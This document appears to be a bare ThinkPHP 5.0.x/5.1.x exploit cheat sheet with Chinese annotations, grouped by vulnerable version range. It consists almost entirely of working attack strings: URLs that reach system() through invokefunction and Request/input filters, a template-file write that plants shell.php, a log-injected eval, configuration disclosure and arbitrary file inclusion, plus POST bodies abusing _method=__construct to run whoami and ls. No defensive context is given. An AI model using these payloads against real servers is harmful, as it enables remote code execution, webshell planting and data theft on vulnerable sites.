版本:5.0.0<=ThinkPHP5<=5.0.10

payload

  1. http://localhost/tpdemo/public/?username=mochazz123%0d%0a@eval($_GET[_]);//

版本:5.0.7<=ThinkPHP5<=5.0.225.1.0<=ThinkPHP<=5.1.30

5.1.x payload

  1. ?s=index/\think\Request/input&filter[]=system&data=pwd
  2. ?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
  3. ?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
  4. ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
  5. ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

5.0.x payload

  1. ?s=index/think\config/get&name=database.username # 获取配置信息
  2. ?s=index/\think\Lang/load&file=../../test.jpg    # 包含任意文件
  3. ?s=index/\think\Config/load&file=../../t.php     # 包含任意.php文件
  4. ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

版本:5.0.0<=ThinkPHP5<=5.0.235.1.0<=ThinkPHP<=5.1.30

payload

  1. # ThinkPHP <= 5.0.13
  2. POST /?s=index/index
  3. s=whoami&_method=__construct&method=&filter[]=system
  5. # ThinkPHP <= 5.0.23、5.1.0 <= 5.1.16 需要开启框架app_debug
  6. POST /
  7. _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al
  9. # ThinkPHP <= 5.0.23 需要存在xxx的method路由,例如captcha
  10. POST /?s=xxx HTTP/1.1
  11. _method=__construct&filter[]=system&method=get&get[]=ls+-al
  12. _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls